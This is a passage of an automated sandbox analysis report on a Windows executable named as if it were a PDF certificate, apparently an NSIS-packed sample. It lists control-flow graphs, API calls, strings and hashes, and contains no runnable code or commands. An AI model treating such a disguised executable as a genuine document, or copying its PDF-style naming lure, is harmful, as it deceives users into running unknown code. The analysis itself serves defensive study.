3697->3722 3699 404007 EnableWindow 3704 40401b 3699->3704 3700 404020 GetSystemMenu EnableMenuItem SendMessageW 3701 404050 SendMessageW 3700->3701 3700->3704 3701->3704 3703 403d16 18 API calls 3703->3704 3704->3700 3704->3703 3723 404243 SendMessageW 3704->3723 3724 406297 lstrcpynW 3704->3724 3706 40407f lstrlenW 3707 4062b9 17 API calls 3706->3707 3708 404095 SetWindowTextW 3707->3708 3709 401389 2 API calls 3708->3709 3709->3686 3710->3667 3711 4040f3 CreateDialogParamW 3710->3711 3711->3667 3712 404126 3711->3712 3713 40420e 18 API calls 3712->3713 3714 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3713->3714 3715 401389 2 API calls 3714->3715 3716 404177 3715->3716 3716->3666 3717 40417f ShowWindow 3716->3717 3718 40425a SendMessageW 3717->3718 3718->3667 3720 4062b9 17 API calls 3719->3720 3721 404219 SetDlgItemTextW 3720->3721 3721->3695 3722->3699 3723->3704 3724->3706 3726 4041f4 SendMessageW 3725->3726 3727 4041ee 3725->3727 3726->3685 3727->3726 3729 404338 3728->3729 3730 40428d GetWindowLongW 3728->3730 3729->3666 3730->3729 3731 4042a2 3730->3731 3731->3729 3732 4042d2 3731->3732 3733 4042cf GetSysColor 3731->3733 3734 4042e2 SetBkMode 3732->3734 3735 4042d8 SetTextColor 3732->3735 3733->3732 3736 404300 3734->3736 3737 4042fa GetSysColor 3734->3737 3735->3734 3738 404311 3736->3738 3739 404307 SetBkColor 3736->3739 3737->3736 3738->3729 3740 404324 DeleteObject 3738->3740 3741 40432b CreateBrushIndirect 3738->3741 3739->3738 3740->3741 3741->3729 4460 401735 4461 402c41 17 API calls 4460->4461 4462 40173c SearchPathW 4461->4462 4463 401757 4462->4463 4464 402a35 4465 402c1f 17 API calls 4464->4465 4466 402a3b 4465->4466 4467 402a72 4466->4467 4468 40288b 4466->4468 4470 402a4d 4466->4470 4467->4468 4469 4062b9 17 API calls 4467->4469 4469->4468 4470->4468 4472 4061de wsprintfW 4470->4472 4472->4468 4473 4014b8 4474 4014be 4473->4474 4475 401389 2 API calls 4474->4475 4476 4014c6 4475->4476 4477 4046b8 4478 4046c8 4477->4478 4479 4046ee 4477->4479 4480 40420e 18 API calls 4478->4480 4481 404275 8 API calls 4479->4481 4482 4046d5 SetDlgItemTextW 4480->4482 4483 4046fa 4481->4483 4482->4479 4484 401db9 GetDC 4485 402c1f 17 API calls 4484->4485 4486 401dcb GetDeviceCaps MulDiv ReleaseDC 4485->4486 4487 402c1f 17 API calls 4486->4487 4488 401dfc 4487->4488 4489 4062b9 17 API calls 4488->4489 4490 401e39 CreateFontIndirectW 4489->4490 4491 402592 4490->4491 4492 40283b 4493 402843 4492->4493 4494 402847 FindNextFileW 4493->4494 4497 402859 4493->4497 4495 4028a0 4494->4495 4494->4497 4498 406297 lstrcpynW 4495->4498 4498->4497 3768 40543e 3769 4055e8 3768->3769 3770 40545f GetDlgItem GetDlgItem GetDlgItem 3768->3770 3772 4055f1 GetDlgItem CreateThread FindCloseChangeNotification 3769->3772 3774 405619 3769->3774 3814 404243 SendMessageW 3770->3814 3772->3774 3817 4053d2 5 API calls 3772->3817 3773 405644 3778 405650 3773->3778 3779 4056a4 3773->3779 3774->3773 3776 405630 ShowWindow ShowWindow 3774->3776 3777 405669 3774->3777 3775 4054cf 3780 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3775->3780 3816 404243 SendMessageW 3776->3816 3784 404275 8 API calls 3777->3784 3782 405658 3778->3782 3783 40567e ShowWindow 3778->3783 3779->3777 3787 4056b2 SendMessageW 3779->3787 3785 405544 3780->3785 3786 405528 SendMessageW SendMessageW 3780->3786 3788 4041e7 SendMessageW 3782->3788 3790 405690 3783->3790 3791 40569e 3783->3791 3789 405677 3784->3789 3794 405557 3785->3794 3795 405549 SendMessageW 3785->3795 3786->3785 3787->3789 3796 4056cb CreatePopupMenu 3787->3796 3788->3777 3792 4052ff 24 API calls 3790->3792 3793 4041e7 SendMessageW 3791->3793 3792->3791 3793->3779 3798 40420e 18 API calls 3794->3798 3795->3794 3797 4062b9 17 API calls 3796->3797 3799 4056db AppendMenuW 3797->3799 3800 405567 3798->3800 3801 4056f8 GetWindowRect 3799->3801 3802 40570b TrackPopupMenu 3799->3802 3803 405570 ShowWindow 3800->3803 3804 4055a4 GetDlgItem SendMessageW 3800->3804 3801->3802 3802->3789 3806 405726 3802->3806 3807 405593 3803->3807 3808 405586 ShowWindow 3803->3808 3804->3789 3805 4055cb SendMessageW SendMessageW 3804->3805 3805->3789 3809 405742 SendMessageW 3806->3809 3815 404243 SendMessageW 3807->3815 3808->3807 3809->3809 3810 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3809->3810 3812 405784 SendMessageW 3810->3812 3812->3812 3813 4057ad GlobalUnlock SetClipboardData CloseClipboard 3812->3813 3813->3789 3814->3775 3815->3804 3816->3773

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 7 4033b5 1->7 4 4033c1-4033d5 call 406601 lstrlenA 2->4 9 4033d7-4033f3 call 406671 * 3 4->9 7->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 21 4033fd 17->21 21->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 30 403495-40349a 28->30 31 40349c-4034a0 28->31 38 403610-40362a DeleteFileW call 402edd 29->38 39 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->39 30->30 30->31 33 4034a2-4034a6 31->33 34 4034a7-4034ab 31->34 33->34 36 4034b1-4034b7 34->36 37 40356a-403577 call 405b99 34->37 42 4034d2-40350b 36->42 43 4034b9-4034c1 36->43 54 403579-40357a 37->54 55 40357b-403581 37->55 56 403630-403636 38->56 57 4036db-4036eb ExitProcess OleUninitialize 38->57 39->38 52 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 39->52 50 403528-403562 42->50 51 40350d-403512 42->51 48 4034c3-4034c6 43->48 49 4034c8 43->49 48->42 48->49 49->42 50->37 53 403564-403568 50->53 51->50 58 403514-40351c 51->58 52->38 52->57 53->37 60 403589-403597 call 406297 53->60 54->55 55->28 61 403587 55->61 62 4036cb-4036d2 call 403987 56->62 63 40363c-403647 call 405b99 56->63 64 403811-403817 57->64 65 4036f1-403701 call 4058fd ExitProcess 57->65 66 403523 58->66 67 40351e-403521 58->67 71 40359c 60->71 61->71 79 4036d7 62->79 84 403695-40369f 63->84 85 403649-40367e 63->85 68 403895-40389d 64->68 69 403819-40382f GetCurrentProcess OpenProcessToken 64->69 66->50 67->50 67->66 80 4038a3-4038a7 ExitProcess 68->80 81 40389f 68->81 76 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 69->76 77 403865-403873 call 406671 69->77 71->29 76->77 92 403881-40388c ExitWindowsEx 77->92 93 403875-40387f 77->93 79->57 81->80 86 4036a1-4036af call 405c74 84->86 87 403707-40371b call 405868 lstrcatW 84->87 89 403680-403684 85->89 86->57 102 4036b1-4036c7 call 406297 * 2 86->102 100 403728-403742 lstrcatW lstrcmpiW 87->100 101 40371d-403723 lstrcatW 87->101 94 403686-40368b 89->94 95 40368d-403691 89->95 92->68 98 40388e-403890 call 40140b 92->98 93->92 93->98 94->95 99 403693 94->99 95->89 95->99 98->68 99->84 100->57 105 403744-403747 100->105 101->100 102->62 107 403750 call 40584b 105->107 108 403749-40374e call 4057ce 105->108 115 403755-403763 SetCurrentDirectoryW 107->115 108->115 116 403770-403799 call 406297 115->116 117 403765-40376b call 406297 115->117 121 40379e-4037ba call 4062b9 DeleteFileW 116->121 117->116 124 4037fb-403803 121->124 125 4037bc-4037cc CopyFileW 121->125 124->121 127 403805-40380c call 40605d 124->127 125->124 126 4037ce-4037ee call 40605d call 4062b9 call 405880 125->126 126->124 136 4037f0-4037f7 CloseHandle 126->136 127->57 136->124
          APIs
          • SetErrorMode.KERNELBASE ref: 0040338F
          • GetVersion.KERNEL32 ref: 00403395
          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
          • OleInitialize.OLE32(00000000), ref: 0040340C
          • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
          • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00000020,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
            • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
            • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035CC
          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035E8
          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
            • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
          • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 004036DB
          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
          • ExitProcess.KERNEL32 ref: 00403701
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403714
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403723
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040372E
          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
          • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
          • CopyFileW.KERNEL32(007B6800,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
          • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
          • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
          • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
          • ExitProcess.KERNEL32 ref: 004038A7
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
          • String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Skamflelsens\fameless$C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
          • API String ID: 424501083-2353104377
          • Opcode ID: 23254d1ad701b6aad5607cc447cd93654877cb62b49b8ea76a2aa6fa516ca3c5
          • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
          • Opcode Fuzzy Hash: 23254d1ad701b6aad5607cc447cd93654877cb62b49b8ea76a2aa6fa516ca3c5
          • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 137 40543e-405459 138 4055e8-4055ef 137->138 139 40545f-405526 GetDlgItem * 3 call 404243 call 404b9c GetClientRect GetSystemMetrics SendMessageW * 2 137->139 141 4055f1-405613 GetDlgItem CreateThread FindCloseChangeNotification 138->141 142 405619-405626 138->142 157 405544-405547 139->157 158 405528-405542 SendMessageW * 2 139->158 141->142 144 405644-40564e 142->144 145 405628-40562e 142->145 149 405650-405656 144->149 150 4056a4-4056a8 144->150 147 405630-40563f ShowWindow * 2 call 404243 145->147 148 405669-405672 call 404275 145->148 147->144 161 405677-40567b 148->161 154 405658-405664 call 4041e7 149->154 155 40567e-40568e ShowWindow 149->155 150->148 152 4056aa-4056b0 150->152 152->148 159 4056b2-4056c5 SendMessageW 152->159 154->148 162 405690-405699 call 4052ff 155->162 163 40569e-40569f call 4041e7 155->163 166 405557-40556e call 40420e 157->166 167 405549-405555 SendMessageW 157->167 158->157 168 4057c7-4057c9 159->168 169 4056cb-4056f6 CreatePopupMenu call 4062b9 AppendMenuW 159->169 162->163 163->150 176 405570-405584 ShowWindow 166->176 177 4055a4-4055c5 GetDlgItem SendMessageW 166->177 167->166 168->161 174 4056f8-405708 GetWindowRect 169->174 175 40570b-405720 TrackPopupMenu 169->175 174->175 175->168 179 405726-40573d 175->179 180 405593 176->180 181 405586-405591 ShowWindow 176->181 177->168 178 4055cb-4055e3 SendMessageW * 2 177->178 178->168 182 405742-40575d SendMessageW 179->182 183 405599-40559f call 404243 180->183 181->183 182->182 184 40575f-405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 182->184 183->177 186 405784-4057ab SendMessageW 184->186 186->186 187 4057ad-4057c1 GlobalUnlock SetClipboardData CloseClipboard 186->187 187->168
          APIs
          • GetDlgItem.USER32(?,00000403), ref: 0040549C
          • GetDlgItem.USER32(?,000003EE), ref: 004054AB
          • GetClientRect.USER32(?,?), ref: 004054E8
          • GetSystemMetrics.USER32(00000002), ref: 004054EF
          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
          • ShowWindow.USER32(?,00000008), ref: 0040558B
          • GetDlgItem.USER32(?,000003EC), ref: 004055AC
          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
          • GetDlgItem.USER32(?,000003F8), ref: 004054BA
            • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
          • GetDlgItem.USER32(?,000003EC), ref: 004055FE
          • CreateThread.KERNELBASE(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405613
          • ShowWindow.USER32(00000000), ref: 00405637
          • ShowWindow.USER32(?,00000008), ref: 0040563C
          • ShowWindow.USER32(00000008), ref: 00405686
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
          • CreatePopupMenu.USER32 ref: 004056CB
          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
          • GetWindowRect.USER32(?,?), ref: 004056FF
          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
          • OpenClipboard.USER32(00000000), ref: 00405760
          • EmptyClipboard.USER32 ref: 00405766
          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
          • GlobalLock.KERNEL32(00000000), ref: 0040577C
          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
          • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
          • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
          • CloseClipboard.USER32 ref: 004057C1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
          • String ID: {
          • API String ID: 4154960007-366298937
          • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
          • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
          • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
          • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
          APIs
          • FindFirstFileW.KERNELBASE(?,007A4F70,007A4728,00405CBD,007A4728,007A4728,00000000,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420), ref: 004065E5
          • FindClose.KERNEL32(00000000), ref: 004065F1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Find$CloseFileFirst
          • String ID: pOz
          • API String ID: 2295610775-1820424874
          • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
          • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
          • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
          • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 188 403d35-403d47 189 403e88-403e97 188->189 190 403d4d-403d53 188->190 192 403ee6-403efb 189->192 193 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 189->193 190->189 191 403d59-403d62 190->191 196 403d64-403d71 SetWindowPos 191->196 197 403d77-403d7a 191->197 194 403f3b-403f40 call 40425a 192->194 195 403efd-403f00 192->195 193->192 210 403f45-403f60 194->210 200 403f02-403f0d call 401389 195->200 201 403f33-403f35 195->201 196->197 203 403d94-403d9a 197->203 204 403d7c-403d8e ShowWindow 197->204 200->201 223 403f0f-403f2e SendMessageW 200->223 201->194 209 4041db 201->209 206 403db6-403db9 203->206 207 403d9c-403db1 DestroyWindow 203->207 204->203 214 403dbb-403dc7 SetWindowLongW 206->214 215 403dcc-403dd2 206->215 212 4041b8-4041be 207->212 213 4041dd-4041e4 209->213 217 403f62-403f64 call 40140b 210->217 218 403f69-403f6f 210->218 212->209 225 4041c0-4041c6 212->225 214->213 221 403e75-403e83 call 404275 215->221 222 403dd8-403de9 GetDlgItem 215->222 217->218 219 403f75-403f80 218->219 220 404199-4041b2 DestroyWindow EndDialog 218->220 219->220 227 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 219->227 220->212 221->213 228 403e08-403e0b 222->228 229 403deb-403e02 SendMessageW IsWindowEnabled 222->229 223->213 225->209 226 4041c8-4041d1 ShowWindow 225->226 226->209 258 403fd5-403fda 227->258 259 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 227->259 232 403e10-403e13 228->232 233 403e0d-403e0e 228->233 229->209 229->228 237 403e21-403e26 232->237 238 403e15-403e1b 232->238 236 403e3e-403e43 call 4041e7 233->236 236->221 241 403e5c-403e6f SendMessageW 237->241 243 403e28-403e2e 237->243 238->241 242 403e1d-403e1f 238->242 241->221 242->236 246 403e30-403e36 call 40140b 243->246 247 403e45-403e4e call 40140b 243->247 254 403e3c 246->254 247->221 256 403e50-403e5a 247->256 254->236 256->254 258->259 262 40401b-40401c 259->262 263 40401e 259->263 264 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 262->264 263->264 265 404050-404061 SendMessageW 264->265 266 404063 264->266 267 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 265->267 266->267 267->210 278 4040ae-4040b0 267->278 278->210 279 4040b6-4040ba 278->279 280 4040d9-4040ed DestroyWindow 279->280 281 4040bc-4040c2 279->281 280->212 283 4040f3-404120 CreateDialogParamW 280->283 281->209 282 4040c8-4040ce 281->282 282->210 284 4040d4 282->284 283->212 285 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 283->285 284->209 285->209 290 40417f-404192 ShowWindow call 40425a 285->290 292 404197 290->292 292->212
          APIs
          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
          • ShowWindow.USER32(?), ref: 00403D8E
          • DestroyWindow.USER32 ref: 00403DA2
          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
          • GetDlgItem.USER32(?,?), ref: 00403DDF
          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
          • IsWindowEnabled.USER32(00000000), ref: 00403DFA
          • GetDlgItem.USER32(?,00000001), ref: 00403EA8
          • GetDlgItem.USER32(?,00000002), ref: 00403EB2
          • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
          • GetDlgItem.USER32(?,00000003), ref: 00403FC3
          • ShowWindow.USER32(00000000,?), ref: 00403FE4
          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
          • EnableWindow.USER32(?,?), ref: 00404011
          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
          • EnableMenuItem.USER32(00000000), ref: 0040402E
          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
          • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
          • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
          • ShowWindow.USER32(?,0000000A), ref: 004041CB
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
